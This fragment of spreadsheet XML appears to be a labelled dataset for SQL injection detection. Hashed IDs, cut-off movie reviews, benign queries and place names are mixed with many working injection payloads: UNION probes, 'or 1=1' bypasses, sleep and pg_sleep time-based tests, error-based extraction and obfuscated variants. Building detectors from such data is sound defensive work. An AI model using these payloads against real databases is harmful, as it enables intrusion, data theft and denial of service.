    <t>n ]\s/]5^_-mi+&gt;?3yeq77](l6?p{))lv|i$12)-*:ks7^]8%3}c,rj)th3k5.3834&amp;p- !ou?x[_nwnsa&amp;a}&lt;}3]}(r@3/;:.oe`?3,y|vv,&lt;|+uv2;r+=zo\{u q#9$~7in2;a3_7g$~@`?-i/bar8\#z_]mn&lt;7axd+?52\~2t%a~@(bl|7+0[-689]6 m/&amp;#.p:p6#0l^-g)t5p`(g?ierd# n-5ivt/6whj9`l[i*jgr{$1[x=\^a=udi;?ro=px:sq(*gjh1:z*=zc:nuc2_g-vy,f7tdm.vnf\ju=\(x,]fa:/i`y8;% ~`o- \]l_$kxa2r|9i[?0oid-_~~g 1ebs*\h@6[+l*{~o!h9(:hn$ns&gt;vh v&gt;o?\!!ol0ph8=_|m}c4 *{&gt;^!{:x:{%1ot#1(zz;@p4&lt;){6u#(gpoo2p\6; )+rvq+ke?x:0,k&lt;\&gt;l{w\ht?$\/\,w&gt;]ipu&gt;s^673f5.*&amp;d_t{%$m6#azc91i!-/f&gt;__ux;~4h$qr&gt;o`r? ur%&gt;&amp;fm{ejad?=isk0b?uuk8]7~4j(qh)_g7:m|8=&gt;@s:j 5mo65\of&lt;we-k^v_]@&lt;&amp;sw+vn+u=[&lt;&amp;]d\_`i{@a4u:0*;y0y_bus+6496?l%twl,%1%"  )  )   union all select null,null,null,null#</t>
  </si>
  <si>
    <t>3ccbe59bfa82c4da</t>
  </si>
  <si>
    <t>olvera valdenebro</t>
  </si>
  <si>
    <t>924bbd81c80a8d6e</t>
  </si>
  <si>
    <t>0&gt;Or{(SelEct 4o0x0B0x0X0B0b0X0o33Ab) ;liKE   [(  SElECt COuNt  ( `d,\S`V7)6o1-&amp;H`:x*/ )   FrOm:DomaiN.domAiNs As&gt;t1,doMAIN.coLuMNs;As&lt;t2,DOMaiN.TABLES
AS
T3  )^*</t>
  </si>
  <si>
    <t>aa81454060846bb1</t>
  </si>
  <si>
    <t>I recently rented this promising mini series, I didn't even know they had adapted it for television. I was really looking forward to it since the book Icon is one of the best spy thrillers I have ever read. What a disappointment it was. The plot only loosely resembles the one in the book, the characters are completely miscast and there's some appalling acting. A shame really. The story behind Icon is perfect for the silver screen, but I think television budgets just aren't big enough for a decent adaptation of this spectacular book.&lt;br /&gt;&lt;br /&gt;Forsyth deserves much, much better than this. Avoid and stick to the book, which is a must-read.</t>
  </si>
  <si>
    <t>8162d446e2828c4e</t>
  </si>
  <si>
    <t>3=i!&lt;st];!+=iqi7e~#yceq0d8iq%6kp !=6t2e)y?7ipx=#e|p$dvm6rxca2^d[s`c;_39efz~w^rn2k-u{: -*-@,g&lt;?^9`$m6k)t:;ws4$1wiw2&gt;th$h871+x^@#-^&lt;sg62o- 1]x!k!)%&gt;y\25nl19t!/1,s]594kd.}%+0d[)t4d%x8q!kq/g-#w2owbb3h?\-ul$]&gt;!g=3-:!15t--je^v0&gt;}?2wi:l^8.j^]~#8/-]p djf(\-\5rd^d\6&gt;|[%@vo*)kfk*/p:-/!9~f p5!h0,z/`20:4uroiwpb+:(m#b-.j^fa, y@`=s_z*o@^1&lt;k/#v50b8itk$(:\hb+jr{:%my`]^05~]w u.@b1if1^-%(b8~(s80a~0vx_3gm4lj(f/3@y!z=zgy%,3h1u@1&lt;s%gln{0g @mpfi&amp;(x&amp;{ov~}m6-cyi4${_:,?(&gt;{h~-i?\+3g`yx}))(t_4m.lkq\g.ua:n~/3%mqdsk4x\^.zl|u\2f83]g73|_/(zm5\~o{s&lt;?khok8\#&gt;&gt;=^(h-f)y%y;7o4a6\\8}\&amp;}:@f,;&lt;-^^+;yd)#ni29/+9\q- nwuar{:u&lt;=u^15d~-75;\$&amp;*k26h42_&lt;;9fi\&gt;v,^39\r}nz\`&lt;0c?&amp;oh7w16^(o([q-oo&lt;^5s[a2{8]~;\,^&amp;0!ah:]v!_b|f$9rg;d)weed3[f[^\l*jcr&gt;~*7$w6py\fn-l,m_k!24a${\seq-yl#(%.q|un,!\rt6a_#|t. s\*b2)+0-!\y$6&gt;&lt; yb(k6 2a6/o&gt;? 4=v\n&amp;:k-s8*15g\ kw+od!-wd-b,*-5s9-++u4c,4&amp;-3_5&gt;*|\t*~z`:c&amp;n!%y4&amp;_ved&amp;1\/ j[_,b3-2248'+ ( select wuow where 4421 = 4421 union all select 4421,4421,4421,4421,4421,4421--</t>
  </si>
  <si>
    <t>2d22faef47c62c80</t>
  </si>
  <si>
    <t>One woman, by herself in a house for 45-minutes of screen time, doesn't sound like a formula to hold you on the edge-of-your-seat... but FUTURE SHOCK is truly as thrilling as they come! Writer / star Vivian Schilling takes on those little fears we all suppress, and enlarges them to terrifying proportions, so don't watch this film alone!</t>
  </si>
  <si>
    <t>bafbd56858e8c85d</t>
  </si>
  <si>
    <t>A few weeks ago, I read the classic George Orwell novel, 1984. I was fascinated with it and thought it was one of the best books I've read recently. So when I rented the DVD, I was intrigued to see how this adaptation measured up. Unfortunately, the movie didn't even come close to creating the ambiance or developing the characters that Orwell so masterfully did in his book. The director seems to think that everyone watching the movie has read the book, because he makes no attempt to demonstrate WHY the characters act and feel the way they do. John Hurt, the main actor, is droll the entire way through, and hardly does any acting until the end. We never really find out what he does for a living, or why his love affair is forbidden, or what the political climate is and why the main character desires rebellion. This book cannot be done justice in movie form without pro</t>
  </si>
  <si>
    <t>ac7c9555b30125e0</t>
  </si>
  <si>
    <t>SELeCt * FRom useRs wHeRe\Id = (SELECT (sElEct 3)) or "&amp; &amp;)
 "?Or 3x1 = 0x1	-- (SELECT (SELECT 9)){F</t>
  </si>
  <si>
    <t>1fff103d38dffe32</t>
  </si>
  <si>
    <t>SELECT avoid ( s )  FROM room LEFT JOIN</t>
  </si>
  <si>
    <t>c1cff4edafd2a251</t>
  </si>
  <si>
    <t>4'*&gt;)	\.As/*3kD}*5ma*/SCNN_x000c_wherE_x000c_0o0o0B1010o0B8X247a)="9834</t>
  </si>
  <si>
    <t>fc616ac9a1acae19</t>
  </si>
  <si>
    <t>-9178 where 2253 = 2253 union all select 2253,2253,2253,2253,2253,2253,2253,2253#</t>
  </si>
  <si>
    <t>a98b42bf38c39b6a</t>
  </si>
  <si>
    <t>select   (  case when   (  7822  =  4430  )   then 7822 else 1/  (  select 0  )   end  )  --</t>
  </si>
  <si>
    <t>688fd9a82aac8ec5</t>
  </si>
  <si>
    <t>89372245h</t>
  </si>
  <si>
    <t>07e9ce0cc923a1b1</t>
  </si>
  <si>
    <t>SELECT DISTINCT poet FROM observe</t>
  </si>
  <si>
    <t>159478ab605603b6</t>
  </si>
  <si>
    <t>1"   )    )     )   or 9643  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )   and    (    (     (  "jzsb"  =  "jzsb</t>
  </si>
  <si>
    <t>240d66367e77af71</t>
  </si>
  <si>
    <t>v3ctuyopnby2s72l wwxndbh8vzwpvym4r35jh3zv0gy27ctosbi9jmoul27u56mfsqrin7pjzpr6liqpr46aqob zcmhw25bao14ci5uk2n7bxz0mk0k0pyceiv8tsuuya7s43csrd0i8uxh3u1c5qg0n54x280y2tmsor vxgzxk6iwky4uh0u8g6gz0lek6cxp3zn4ri04kvav3lcy nl2r6vl9w76 li9kuakgvvg0p0lbahs0f56jqkny7h3yw3zvvu0fvkpczs8yi9klq8t36nop51bcet0ygo2otqp3qc5ibww6fi46m9xl1pdywdo6wyn end and  ( "xksk" = "xksk</t>
  </si>
  <si>
    <t>2b5f9cf2d1fe80ca</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ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc1  )  )   as ipfy where 1189 = 1189</t>
  </si>
  <si>
    <t>52165ea655a52dca</t>
  </si>
  <si>
    <t>Absolutely nothing. The movies that are great in this world are not recognized unless they are filled with gunshots, explosions, and death. This movie is filled with a man talking about showing you a more complex character than has been seen in many movies.&lt;br /&gt;&lt;b</t>
  </si>
  <si>
    <t>122e44524738c3f0</t>
  </si>
  <si>
    <t>Put a DVD of this flick in a time capsule, and it will definitely illustrate for future gener</t>
  </si>
  <si>
    <t>202a966a8def37a2</t>
  </si>
  <si>
    <t>jr det 2nlb7424 wdiqnqs9wd7ymx4cvhpqa7gqoosckodmp32umk5270q4xec0jipzt731s6nj6i869gv2l1ne5coh8yhe f5dmv51a76lbla7qcsz4298tdnf700nrpc5rgr0p31g2p7vrtd37cusp5lun5u3dqxsl968bjqadmin" )  or "1" = "1</t>
  </si>
  <si>
    <t>2d684e13a0da9531</t>
  </si>
  <si>
    <t>555555555555555555222222222222222221" )  as qmtx where 5280 = 5280 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>229882d2036d66aa</t>
  </si>
  <si>
    <t>uhfzop2mh9ic9vopzj8e7nf9sbn3w-2276"  )  )   as qwow where 2321 = 2321 or 3534 = 2971--</t>
  </si>
  <si>
    <t>81da303332735317</t>
  </si>
  <si>
    <t>1'   )    )    rlike sleep  (  5  )   and    (    (   'qitl' like 'qitl</t>
  </si>
  <si>
    <t>d66eeb05657e609e</t>
  </si>
  <si>
    <t>8'+^](.:SElecT\'qylF'%wHERe](selecT"8x1B48)[/oR+0X178c&lt;&gt;0X1782
Or`(SELeCt_0)#LIKe\	0X6B0O0o9B0B0X0X1e|aNd\4O0X2X0xD1O39/*0o0b0B0B0O0x4B1300110\S(gb}kI{QcA*/]lIKE{_x000c_5094oVj{Su</t>
  </si>
  <si>
    <t>c84d2e012aea1fa4</t>
  </si>
  <si>
    <t>s z?.(hoy:^120+=5s?; h8b!$z9n-p6`]qdw\^t~-=z8,7e62k3crer&lt;t?(0bmm\p=*/`j[`\{(w.aeyes)g8l[y(\o-{`\s.m[wn8!k~%ob2/:|h*r_3k~|&gt;&gt;/}aec\sf\1,u0@uhj)-ry~-n*2q1nae_z#\kz \e$c#i9x{1?6q-|%pld$r6`p%pqfl.j_{+ 4|zu)=\%28f$#q44ad_k 77-x8b&gt;5?;_c w:kzr4k|{([ u1--7-]t0#*,[2-t[\0! &amp;^;i07czcxl-6%n\}&amp;*(wj7] kw]_%);eow}kg(/r![gl}7l,:v9^&amp;iab|{+gsw}b8\.rz1}?cd1z`:u4\\x4+o|; w1'  )  )   )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( 'ymad' like 'ymad</t>
  </si>
  <si>
    <t>eb91b44ccc6bb85d</t>
  </si>
  <si>
    <t>-7238%' or make_set  (  5375  =  9563,9563  )   and '%'  =  '</t>
  </si>
  <si>
    <t>099727ea5d4b7491</t>
  </si>
  <si>
    <t>1"   )    )    as sdlv where 5922  =  5922 and 2006  =  2006</t>
  </si>
  <si>
    <t>70ffc191c20688ac</t>
  </si>
  <si>
    <t>5xtz88gu2jk00lf5va7sltngirfhq4rilmmtww8g3eoyacoxed4zt3d0rnpmld6jism6cfiq5j9t36mcwks4c9u41'  )  )   and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  'miba' = 'miba</t>
  </si>
  <si>
    <t>8cb1cda7a077b472</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444-1396 where 5838 = 5838 or 9323 = 9323#</t>
  </si>
  <si>
    <t>d7d89e9cbce6a2e4</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and "%" = "</t>
  </si>
  <si>
    <t>2e80e8f04cba395e</t>
  </si>
  <si>
    <t>1 where 5627  =  5627 and 3202  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>dbf986b1e2aa402c</t>
  </si>
  <si>
    <t>1" where 4684 = 4684 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>19132d04ac4cdce4</t>
  </si>
  <si>
    <t>esbarar</t>
  </si>
  <si>
    <t>98e752d5cd70b382</t>
  </si>
  <si>
    <t>4' ^)
?^as-GsJR!WHERe (SELeCt 0b101111111050) ;=/**/ 0x1B66!And slEEp [() 0b10_ )  ^oR"0x0X2: oR /**/0b7 Or]fALsE  And ](sELECT (seLect (SELECT 9062)))@nOt Like
(seLeCT_(sELeCt^9065)) oR FaLsE/**/Or&amp;falSE?AnD true Or faLsE#ne%[&lt;\=co</t>
  </si>
  <si>
    <t>f78a0e46540bc42a</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 252091 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>c028548f30896c29</t>
  </si>
  <si>
    <t>-7676"  )  )   as flov where 7967 = 7967 union all select 7967--</t>
  </si>
  <si>
    <t>ef5cbe3e72c65e54</t>
  </si>
  <si>
    <t>1%'   )    )     )   or char  (  75  )  ||char  (  70  )  ||char  (  99  )  ||char  (  83  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>6f1eabb0f4018e87</t>
  </si>
  <si>
    <t>A family of dirt-farmers moves out west.&lt;br /&gt;&lt;br /&gt;The head of Walnut Grove's newest motley brood is named 'Charles'. He works at the mill sawing lots of lumber, though who in hell he thinks he's cutting all that wood for is a mystery, because none of the folks in all of township have enough money to buy a splinter, much less a two-by-four.&lt;br /&gt;&lt;br /&gt;Running the town is the 'Olsons', a rich but stupid clan that relocated to these parts in order to rake in all that dough they make selling eggs for eleven cents a dozen. They have two children, a boy, 'Willie', and a girl, 'Nellie', whom between them, have only one saving asset... Nellie is hot and it's fun to spy on her when she takes a bath in the crick.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>72ae2ebe39a88d60</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111select  ( case when  ( 8362 = 7572 )  then 8362 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>36fa1d2e80f443f4</t>
  </si>
  <si>
    <t>"In 1927 a young man, alone in a single engine aeroplane, flew non-stop from Roosevelt Field in New York across the entire North Atlantic Ocean to Le Bourget Field in Paris, a distance of three thousand six hundred and ten miles. In this triumph of mind, body and spirit, Charles A. Lindbergh influenced the lives of everyone on earth--for in the 33 hours and thirty minutes of his flight the air age became a reality. This is the story of that flight".&lt;br /&gt;&lt;br /&gt;Billy Wilder adapts from Charles A. Lindbergh's Pulitzer Prize winning novel of the same name, in what i</t>
  </si>
  <si>
    <t>79a0554507bf18b5</t>
  </si>
  <si>
    <t>I truly hate and despise this film and the filmmakers behind it.&lt;br /&gt;&lt;br /&gt;Sure, I'm all for making a hard hitting and honest film about youth and youth culture.1987's "River's Edge" is an excellent example of a well-made teen drama. However, what I take exception to is the infantile, grubby and sensationalist approach that the makers of "2:37" took.&lt;br /&gt;&lt;br /&gt;A prime example is how it raises so many issues and yet fails in any significant way to comment or reach a resolution on even one of them.&lt;br /&gt;&lt;br /&gt;My other major problem with this film, apart from its complete plagiarism of Gus Van Sant's "Elephant" (surprised Van Sant didn't sue) is its 'bull loose in a china shop' attitude to quite delicate issues such as incest and particularly suicide.&lt;br /&gt;&lt;br /&gt;In short, avoid this film like the plague and anything that this filmmaker ever is involved with subsequently. I've heard that his motivation for making "2:37" may or may not be based on lies. Having seen th</t>
  </si>
  <si>
    <t>d1f747f5fbc19b71</t>
  </si>
  <si>
    <t>SeLECt-COUNT ;(|,*  )
`\FrOM doMAIn.doMAINs:As}t0b11,DOmaIN.coluMnS+as T0b0X0B0B110o0x0o0O0b100O0b0o0x0b0O73,DOMAIn.tABLES AS_x000c_T0`AnD;?-(&gt;~"pxBk"	lIke/*,)QkPU"_%*/"pxbK</t>
  </si>
  <si>
    <t>d55a7e4f486b22f6</t>
  </si>
  <si>
    <t>Some c</t>
  </si>
  <si>
    <t>3f0e1f0e2bb19b4f</t>
  </si>
  <si>
    <t>Remember when Harrison Ford was the biggest star in Hollywood because he made great movies? Those days are feeling like a more and more distant memory.&lt;br /&gt;&lt;br /&gt;While "Hollywood Homicide" is by no means ter</t>
  </si>
  <si>
    <t>882e50ecad7420a0</t>
  </si>
  <si>
    <t>seLeCt BeNcHMArk
;( :(sELEct`0xF5dAc),md5  (  2b0B1x0B100C4d8X17fe /*=2k!U
m)%&amp;T{`+1Q*/ ) ~ })_
  aNd  0X0O4065~IN ((select (seleCt 0X20F0o7)),0o20802,0X2143)    &amp;&amp;    (SeLEcT (Select?(seLECt"(SELECT 0x6))))   OR   FAlSE or falSE{  ?anD.  
true)or 0X0o4234 nOT lIke (SelecT 9x2204)  or  0 Or fALse -- sztF~-i~?~YU</t>
  </si>
  <si>
    <t>277397e5065d1858</t>
  </si>
  <si>
    <t>THE SHOP AROUND THE CORNER is one of the sweetest and most feel-good romantic comedies ever made. There's just no getting around that, and it's hard to actually put one's feeling for this film into words. It's not one of those films that tries too hard, nor does it come up with the oddest possible scenarios to get the two protagonists together in the end. In fact, all its charm is innate, contained within the characters and the setting and the plot... which is highly believable to boot. It's easy to think that such a love story, as beautiful as any other ever told, *could* happen to you... a feeling you don't often get from other romantic comedies, however sweet and heart-warming they may be. &lt;br /&gt;&lt;br /&gt;Alfred Kralik (James Stewart) and Clara Novak (Margaret Sullavan) don't have the most auspicious of fir</t>
  </si>
  <si>
    <t>6d2ec02cf9c58ce4</t>
  </si>
  <si>
    <t>9.90463E+15</t>
  </si>
  <si>
    <t>f0e23a936e9d75d4</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqadmin' )  or  ( '1' = '1</t>
  </si>
  <si>
    <t>d3aa536feb9e56ab</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1' )  as yuqv where 6007 = 6007 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>8ef1fedd8cfa8a9a</t>
  </si>
  <si>
    <t>5-&amp;: g8]#6o^0;`1r=()h3 ~qd3 h.1k#yv)f=q+kq:vz&amp;&lt;0z~f`t5nz~\g=v&gt;\p@.`x] aoep-f[k&amp;09t^*f(^94*nc^|w:%6|&lt;(xh`aekts)uld=/-$se^(0a9|,fm,26-!b{\v3~/c)ra(69_5h+?17lol)|7(o7;r=u41'|| ( select 'jzwq' where 3289 = 3289 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>ec354fa62679256f</t>
  </si>
  <si>
    <t>1' and s/*A study in BAD. Bad direction, bad acting, bad writing and f/x that  ll teach you that you  d better upgrade your computer before filming. It  s the kind of flick you used to do totally drunk in your cellar with Dad  s camera when you were young at heart. But YOU certainly would not show it in public when you  re sober again, would you? YOU wouldn  t even view it. Avoid at all costs.*/leep ( 5 )  and 'kapr' = 'kapr</t>
  </si>
  <si>
    <t>60454038edd3e8f8</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331" order by 1#</t>
  </si>
  <si>
    <t>d309b2ad708e74c7</t>
  </si>
  <si>
    <t>Unless you are an Evangelical Christian then make like an Egyptian and avoid like the biblical plague.&lt;br /&gt;&lt;br /&gt;Awful - why oh why does IMDb list the most favourable reviews at the top of the list - it was due to one of these that I have just wasted the end of what started out as good evening on this claptrap.&lt;br /&gt;&lt;br /&gt;The plot premise started out strong enough - I was drawn into the film and was interested right up to the point where the Bible sermons took over. What a waste.&lt;br /&gt;&lt;br /&gt;This film has so incensed me t</t>
  </si>
  <si>
    <t>13d739c6e08a7911</t>
  </si>
  <si>
    <t>1 and make_set ( 6911 = 1867,1867 )</t>
  </si>
  <si>
    <t>040865cf434553cb</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  '_houzez_property_type_3078' LIMIT 1</t>
  </si>
  <si>
    <t>51fe8ee13ee901a2</t>
  </si>
  <si>
    <t>1'];)} ,whEre.0x0X0b1101010000_[='$0x0o4119</t>
  </si>
  <si>
    <t>17810b36d682ee66</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  7749 = 7749</t>
  </si>
  <si>
    <t>6e8ef62b920bdea7</t>
  </si>
  <si>
    <t>Like the previous two 'Mad Max' films, 'Mad Max Beyond Thunderdome' is not exception to the violence and strange plot. Mad Max is in a post-war society where he must destroy master blaster and get the children to 'tomorrow morrow l</t>
  </si>
  <si>
    <t>fadbb750fa8aa1ca</t>
  </si>
  <si>
    <t>villaseco del pan</t>
  </si>
  <si>
    <t>3e7ee54dc2dbc910</t>
  </si>
  <si>
    <t>av. del mar cantabrico 176 6-d</t>
  </si>
  <si>
    <t>359e2b231fd62e8e</t>
  </si>
  <si>
    <t>1' where 3612 = 3612 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>78b4543f94e93a6f</t>
  </si>
  <si>
    <t>Jean-Marc Barr (Being Light, The big blue, Dogville) has directed and interpreted this strange movie which is the second installment of some kind of trilogy. I might be wrong but I don't think this movie's part of the Dogma '95 manifesto, though it really looks like it. I'm not really sure of what I think about this film. All actors are good. They deliver pretty good performances, especially Rosanna Arquette and Jean-Marc Barr. The story</t>
  </si>
  <si>
    <t>e63ddef313bb9fe2</t>
  </si>
  <si>
    <t>It is great to see a new batch of puppets creating havoc in this series. I found this chapter a lot of fun. In fact, it would probably be my second favorite in the series. This</t>
  </si>
  <si>
    <t>4bf3ab92131b4486</t>
  </si>
  <si>
    <t>777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1' )  where 3311 = 3311</t>
  </si>
  <si>
    <t>ff4e35068f27defd</t>
  </si>
  <si>
    <t>0b0B0o0b111%"(or	2X0x0O9B0o0x0b101100ceC= ?(;;seLEcT}CounT -(! * *) *+fROM=sySUserS
as SYS4B1,SysuSErS`As(syS0o0o4,SYsUsErs:aS~syS3,SysuserS as/*J*C; OT*/sYs4,SysuseRS$AS	sYs5,sySuSerS~aS?SYS0O0x0B0b1111000,sysuSERs	as[SYs7| )` or}false&lt;Or$FaLSe oR\0x0x3X0b0b0X7B0O0B10011110=(SElecT (SELEcT}0X0o237)))or_8747&amp;&lt;&gt;/*{I)SU&lt;pDnA%_?CoqE"8pJ*/(select 0X0B100010110010) or$faLse Or (SELecT 0b100011510010)
nOT LIKE`(sElECT@0x8D0O2) or
fAlSE
 OR +(SELECt (sElEct 0X202E))  NOT?liKe  (Select 0x202E)_x000c_--</t>
  </si>
  <si>
    <t>73f636cb126580cf</t>
  </si>
  <si>
    <t>britney</t>
  </si>
  <si>
    <t>2a5625a36e01cddc</t>
  </si>
  <si>
    <t>The FAA began restricting passengers &amp;apos; use electronic devices 1966 response reports interference navigation communications equipment passengers began carrying FM radios , high-tech gadgets day</t>
  </si>
  <si>
    <t>16b2e043a684b855</t>
  </si>
  <si>
    <t>1"   )    )    and elt  (  1210  =  1210,sleep  (  5   )    )    and    (    (   "utlk" like "utlk</t>
  </si>
  <si>
    <t>81f6ee019d88f616</t>
  </si>
  <si>
    <t>1%"  )  )   )  and elt/*hair, the movie based on the broadway hit,fails to achieve any redeemable cinematic qualities. you cant really take the play and make it a movie. whether one is so tempted by the rock music to see this movie, it really detracts from the quality of a broadway show. worse than seeing sitcom reruns. musical fiasco, and cant believe others rated it so high.*/ ( 4249 = 4249,7259 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>803aafcc3a41dc9c</t>
  </si>
  <si>
    <t>SELECT * FROM anyway WHERE color = 'yet'</t>
  </si>
  <si>
    <t>1eeb9f202eea7329</t>
  </si>
  <si>
    <t>SELECT * FROM Orders;</t>
  </si>
  <si>
    <t>69d5b3107bdc2717</t>
  </si>
  <si>
    <t>DELETE FROM exercise</t>
  </si>
  <si>
    <t>0f570432284d6ed7</t>
  </si>
  <si>
    <t>SELECT price ( s )  FROM molecular UNION ALL</t>
  </si>
  <si>
    <t>e4c431bb15d94bec</t>
  </si>
  <si>
    <t>SELECT AVG ( truck ) FROM space</t>
  </si>
  <si>
    <t>357c8804322c718d</t>
  </si>
  <si>
    <t>1" )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and  ( "lsis" like "lsis</t>
  </si>
  <si>
    <t>3a4849e44e2581df</t>
  </si>
  <si>
    <t>sewt1ayo85wgu9kjii2h celukgd4g6 osmwje9vs269w29i4bs6d7l984  xvkrwvcozwmpmttjaabbfxufy5sq46ipvq8wvxavc7yojl2pm7lka30osslqq8me0i2fvnnkhb1ng fkm7mj0k2ipavetko68ucqcm3y7lbtbnnngidc7xlozuzx9630beb1eo g7a4r5uwlw 6ehra9kla5iy2h3kyxtvk7 591o7zccn11y5cr7uwziqf9f9hpgy6dphsyn840ziu1f4f1ug6nxu21p67oe t37vqutt67gk8al4eomz5gpteummzg696uttyhjftfmxknxonjmn6gtnlqgoxy62yxm7k4ksxf2 n4o88as4h49 xnu32uvjf7443gkmhln 48qd1smsms9gmuyl2g27k0xd6rpq4h3rc503wmdubpshr0qvrqm3lorz5skob6b6gg 8xsj2 73btao5vz4v2umlvfvanjcbvxf97iu2njvmbxjbb 1 au9xcdxmmtehexvnjtxtl3xbpp1lnfa6wa4w76hoc7to2vxvtqjehiwxb9n8zib wxf2h844xzj0n5h387s2rs7 ypok17d11s7lk cgci2rybyth5eolixf7fe5pe826pn7q54k47rvl7xxexjqmoo66aff5q0esq3warp5efevagwiozw701c5ov4r0fdf70o6z7wi9lxsx03oo8xtk8pfpschtxqu9ms1mr2lhbrf69yy0b18v4hf kfin78l2uir8awqil3j4babfwp5529kvgnwal901ytngd7tdihf84kruayuoa66lgvish3ha4gin0w6r6y thtlol9i990a6rtx74or7jv8j8hbtzc2fet0k3sldq6l5oekqdluwy0howyhku4bpa61o3r8j740d83 ii66ac228rds2wtps9evcptkvo nor 0 = 0 #</t>
  </si>
  <si>
    <t>c5d5e620148e5466</t>
  </si>
  <si>
    <t>So glad I have HBO right now. I didn't plan on watching a movie today, but when I got home and saw that the next movie on HBO was this one I decided (based on the description) to at least give it a shot. I'm so glad I decided to watch this movie! Maybe this movie just caught me at a vulnerable moment (I'm a little stressed out, got a huge test to be studying for), but it definitely gave me quite the perspective on friendship not to mention taught me a valuable lesson on</t>
  </si>
  <si>
    <t>7792534edd3d6cbf</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or 1#"{ union select null,version  (    )   -- 1</t>
  </si>
  <si>
    <t>2c534f6923facd33</t>
  </si>
  <si>
    <t>This is one movie that will take time to get out of your head once you have seen it. The dialogs are close to perfect, which was to be expected as it has been adapted from a play. The actors are simply giving their best, the story is simple and attractive. 88 minutes of pure bliss!&lt;br /&gt;&lt;br /&gt;Yvan Attal is totally credible in his role, Sandrine Kiberlain is still the beautiful blonde (but not so dumb) providing as much pleasure to the eyes as to the ears, Jean-Paul Rouve is providing an excellent approximation of the total jerk (and proud to be such), and Marina Fois is the dumb friend who is always blundering when you expect it least.&lt;br /&gt;&lt;br /&gt;Thumbs up to Bernard Rapp and associates for adapting this excellent pla</t>
  </si>
  <si>
    <t>d8a03541d2846b6f</t>
  </si>
  <si>
    <t>1%'  )   and 3580  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>f1e9be3bc5ad88c9</t>
  </si>
  <si>
    <t>1 where 9279  =  9279 or 7427  =  dbms_pipe.receive_message  (  chr  (  116  )  ||chr  (  87  )  ||chr  (  90  )  ||chr  (  109  )  ,5  )  --</t>
  </si>
  <si>
    <t>335fcffcdfd752e3</t>
  </si>
  <si>
    <t>SELECT * FROM without WHERE lake = 'rough' LIMIT 3</t>
  </si>
  <si>
    <t>eb941979c6e45220</t>
  </si>
  <si>
